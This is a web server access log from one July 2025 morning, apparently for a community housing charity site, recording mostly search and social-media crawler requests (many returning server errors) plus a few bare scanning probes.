57.141.2.25 - - [20/Jul/2025:05:52:28 +0000] "GET /m/homet80800103.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.4 - - [20/Jul/2025:05:53:48 +0000] "GET /m/give32881650.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [20/Jul/2025:05:54:58 +0000] "GET /m/balco40955723.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [20/Jul/2025:05:56:00 +0000] "GET /m/conde70566606.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.65.204 - - [20/Jul/2025:05:56:23 +0000] "GET /m/visua50238628.htm HTTP/1.1" 200 40100 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.2.20 - - [20/Jul/2025:05:57:13 +0000] "GET /m/wise61153021.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
85.208.96.204 - - [20/Jul/2025:05:57:46 +0000] "GET /robots.txt HTTP/1.1" 200 130 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.212 - - [20/Jul/2025:05:57:46 +0000] "GET /landing-page/ HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
57.141.2.25 - - [20/Jul/2025:05:58:26 +0000] "GET /m/aslee51924092.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.10 - - [20/Jul/2025:05:59:25 +0000] "GET /m/socia10400896.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.19 - - [20/Jul/2025:06:00:19 +0000] "GET /m/human11961232.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.210.140.142 - - [20/Jul/2025:06:00:49 +0000] "GET /robots.txt HTTP/1.1" 200 130 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
57.141.2.21 - - [20/Jul/2025:06:01:22 +0000] "GET /m/tiny70620774.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.1 - - [20/Jul/2025:06:02:31 +0000] "GET /m/labou50951124.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
3.146.111.124 - - [20/Jul/2025:06:02:42 +0000] "GET / HTTP/1.1" 500 - "-" "Mozilla/5.0 zgrab/0.x"
66.249.65.192 - - [20/Jul/2025:06:03:19 +0000] "GET /m/benef72342094.htm HTTP/1.1" 200 39966 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.2.29 - - [20/Jul/2025:06:04:04 +0000] "GET /m/prete11637320.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.16 - - [20/Jul/2025:06:04:45 +0000] "GET /m/folk52811556.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.11 - - [20/Jul/2025:06:06:12 +0000] "GET /m/intak50122372.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.4 - - [20/Jul/2025:06:06:55 +0000] "GET /m/fix60248309.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [20/Jul/2025:06:08:17 +0000] "GET /m/benea62619341.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.30 - - [20/Jul/2025:06:09:09 +0000] "GET /m/steel11788920.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.7 - - [20/Jul/2025:06:10:20 +0000] "GET /m/apple81144055.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [20/Jul/2025:06:11:28 +0000] "GET /m/spur60215469.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.7 - - [20/Jul/2025:06:12:36 +0000] "GET /m/diplo20649993.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.1 - - [20/Jul/2025:06:13:45 +0000] "GET /m/goal70972502.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.30 - - [20/Jul/2025:06:14:53 +0000] "GET /m/fast40776603.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.13 - - [20/Jul/2025:06:16:02 +0000] "GET /m/marxi11642592.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [20/Jul/2025:06:17:18 +0000] "GET /m/her82040151.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.29 - - [20/Jul/2025:06:18:15 +0000] "GET /m/jolly51627316.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [20/Jul/2025:06:19:20 +0000] "GET /m/purpl80620279.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.20 - - [20/Jul/2025:06:20:27 +0000] "GET /m/lonel71036878.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.1 - - [20/Jul/2025:06:21:35 +0000] "GET /m/inapp12950160.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.10 - - [20/Jul/2025:06:22:36 +0000] "GET /m/thus81227263.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.9 - - [20/Jul/2025:06:23:54 +0000] "GET /m/confo50446236.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [20/Jul/2025:06:25:03 +0000] "GET /m/help32052522.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.16 - - [20/Jul/2025:06:25:57 +0000] "GET /m/acces12297776.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.19 - - [20/Jul/2025:06:27:11 +0000] "GET /m/marke52432724.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.14 - - [20/Jul/2025:06:28:25 +0000] "GET /m/nurse12860544.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [20/Jul/2025:06:29:20 +0000] "GET /m/scien60944685.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.21 - - [20/Jul/2025:06:30:26 +0000] "GET /m/remar11646568.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.25 - - [20/Jul/2025:06:31:33 +0000] "GET /m/nap80719551.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.20 - - [20/Jul/2025:06:33:10 +0000] "GET /m/excha11109576.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.3 - - [20/Jul/2025:06:33:58 +0000] "GET /m/diamo51343068.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.17 - - [20/Jul/2025:06:34:55 +0000] "GET /m/purpo12813800.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.12 - - [20/Jul/2025:06:36:12 +0000] "GET /m/remem71808262.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [20/Jul/2025:06:37:11 +0000] "GET /m/save72176718.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.26 - - [20/Jul/2025:06:38:24 +0000] "GET /m/impor32168162.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.13 - - [20/Jul/2025:06:39:31 +0000] "GET /m/fade21014017.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.7 - - [20/Jul/2025:06:40:31 +0000] "GET /m/drag41415171.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.21 - - [20/Jul/2025:06:41:42 +0000] "GET /m/fount50835292.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.65.203 - - [20/Jul/2025:06:43:08 +0000] "GET /sitemapk.xml HTTP/1.1" 200 18826 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.2.28 - - [20/Jul/2025:06:43:14 +0000] "GET /m/vocab81289567.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.28 - - [20/Jul/2025:06:44:17 +0000] "GET /m/relat41752755.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.18 - - [20/Jul/2025:06:45:12 +0000] "GET /m/homet80664103.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.21 - - [20/Jul/2025:06:46:15 +0000] "GET /m/often70140174.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.13 - - [20/Jul/2025:06:47:31 +0000] "GET /m/serie61723301.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [20/Jul/2025:06:48:25 +0000] "GET /m/broom61731325.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.10 - - [20/Jul/2025:06:49:45 +0000] "GET /m/frog51456796.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [20/Jul/2025:06:50:45 +0000] "GET /m/quiet20952529.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.25 - - [20/Jul/2025:06:51:46 +0000] "GET /m/fame30175514.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.3 - - [20/Jul/2025:06:52:51 +0000] "GET /m/nasty40355579.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [20/Jul/2025:06:54:03 +0000] "GET /m/evolv71954382.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.19 - - [20/Jul/2025:06:55:36 +0000] "GET /m/movie61072485.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.23 - - [20/Jul/2025:06:56:10 +0000] "GET /m/optio12498024.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.3 - - [20/Jul/2025:06:57:28 +0000] "GET /m/profo82718343.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [20/Jul/2025:06:58:26 +0000] "GET /m/bark30143522.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [20/Jul/2025:06:59:39 +0000] "GET /m/modes71333438.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.11 - - [20/Jul/2025:07:00:38 +0000] "GET /m/squar61997141.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.65.204 - - [20/Jul/2025:07:01:18 +0000] "GET /sitemapb.xml HTTP/1.1" 200 11294 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.2.24 - - [20/Jul/2025:07:01:57 +0000] "GET /m/disco32892082.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
45.227.253.15 - - [20/Jul/2025:07:02:56 +0000] "GET /index.php/jk HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3980 Safari/537.36 Edg/80.0.145.1"
57.141.2.21 - - [20/Jul/2025:07:02:59 +0000] "GET /m/brake70618982.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.15 - - [20/Jul/2025:07:03:59 +0000] "GET /m/grain32798250.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [20/Jul/2025:07:05:10 +0000] "GET /m/seldo40420939.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.26 - - [20/Jul/2025:07:06:19 +0000] "GET /m/kitch22032177.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.21 - - [20/Jul/2025:07:07:27 +0000] "GET /m/clog80091951.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.12 - - [20/Jul/2025:07:08:29 +0000] "GET /m/carry52580388.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.65.203 - - [20/Jul/2025:07:10:31 +0000] "GET /m/men12863944.htm HTTP/1.1" 200 40337 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.65.204 - - [20/Jul/2025:07:10:37 +0000] "POST /get-message-notify HTTP/1.1" 200 41123 "https://www.jrncommunityhousing.charity/m/men12863944.htm" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.2.14 - - [20/Jul/2025:07:10:40 +0000] "GET /m/repre62753453.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.25 - - [20/Jul/2025:07:11:46 +0000] "GET /m/fill40900427.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.17 - - [20/Jul/2025:07:12:53 +0000] "GET /m/glori51190380.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.17 - - [20/Jul/2025:07:13:59 +0000] "GET /m/reade60230661.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.28 - - [20/Jul/2025:07:15:06 +0000] "GET /m/himse42125211.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [20/Jul/2025:07:16:13 +0000] "GET /m/ear80380599.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.17 - - [20/Jul/2025:07:17:20 +0000] "GET /m/refus62724909.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.9 - - [20/Jul/2025:07:18:27 +0000] "GET /m/unlik82850783.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.30 - - [20/Jul/2025:07:19:33 +0000] "GET /m/rigid62019533.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.1 - - [20/Jul/2025:07:20:40 +0000] "GET /m/dinne20632553.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.3 - - [20/Jul/2025:07:21:46 +0000] "GET /m/beam80195087.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.17 - - [20/Jul/2025:07:22:54 +0000] "GET /m/gross62067205.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [20/Jul/2025:07:24:00 +0000] "GET /m/brass80435223.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [20/Jul/2025:07:25:06 +0000] "GET /m/ridic22471201.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.19 - - [20/Jul/2025:07:26:13 +0000] "GET /m/inqui62873885.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.4 - - [20/Jul/2025:07:27:20 +0000] "GET /m/thick40040163.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.13 - - [20/Jul/2025:07:28:26 +0000] "GET /m/sent62507917.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [20/Jul/2025:07:29:33 +0000] "GET /m/satur41044835.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.11 - - [20/Jul/2025:07:30:40 +0000] "GET /m/rug50418460.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.30 - - [20/Jul/2025:07:31:46 +0000] "GET /m/brack62107701.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.13 - - [20/Jul/2025:07:32:53 +0000] "GET /m/invit52840780.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.28 - - [20/Jul/2025:07:33:59 +0000] "GET /m/veer80695903.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [20/Jul/2025:07:35:06 +0000] "GET /m/step71704270.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.65.192 - - [20/Jul/2025:07:35:38 +0000] "GET /sitemapo.xml HTTP/1.1" 200 10589 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.2.24 - - [20/Jul/2025:07:36:13 +0000] "GET /m/reass11942408.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [20/Jul/2025:07:37:19 +0000] "GET /m/chari70405358.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.19 - - [20/Jul/2025:07:38:27 +0000] "GET /m/stabi40423339.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [20/Jul/2025:07:39:33 +0000] "GET /m/concl11266432.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.28 - - [20/Jul/2025:07:40:39 +0000] "GET /m/darli60339605.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.4 - - [20/Jul/2025:07:41:47 +0000] "GET /m/potat30417098.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [20/Jul/2025:07:42:53 +0000] "GET /m/myrna72415990.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.4 - - [20/Jul/2025:07:43:59 +0000] "GET /m/met61187949.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [20/Jul/2025:07:45:07 +0000] "GET /m/appre22226153.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
85.208.96.196 - - [20/Jul/2025:07:45:22 +0000] "GET /robots.txt HTTP/1.1" 200 130 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.17 - - [20/Jul/2025:07:45:23 +0000] "GET /donations/form-donation/ HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
57.141.2.25 - - [20/Jul/2025:07:46:13 +0000] "GET /m/commu60680317.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.18 - - [20/Jul/2025:07:47:20 +0000] "GET /m/tent70344478.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.19 - - [20/Jul/2025:07:48:27 +0000] "GET /m/nonse62826653.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [20/Jul/2025:07:49:33 +0000] "GET /m/hot11016432.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.3 - - [20/Jul/2025:07:50:39 +0000] "GET /m/lot22912497.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [20/Jul/2025:07:51:46 +0000] "GET /m/less10037360.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.10 - - [20/Jul/2025:07:52:53 +0000] "GET /m/oppon31106354.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
134.17.14.12 - - [20/Jul/2025:07:53:10 +0000] "GET /gdftps.php HTTP/1.1" 500 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
57.141.2.8 - - [20/Jul/2025:07:54:00 +0000] "GET /m/crash72666014.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [20/Jul/2025:07:55:06 +0000] "GET /m/adjus62967077.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.65.203 - - [20/Jul/2025:07:55:18 +0000] "GET /sitemapf.xml HTTP/1.1" 200 18554 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.2.10 - - [20/Jul/2025:07:56:13 +0000] "GET /m/ore81067575.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.26 - - [20/Jul/2025:07:57:20 +0000] "GET /m/counc31898194.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.18 - - [20/Jul/2025:07:58:27 +0000] "GET /m/illne31672474.htm HTTP/1.1" 500 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
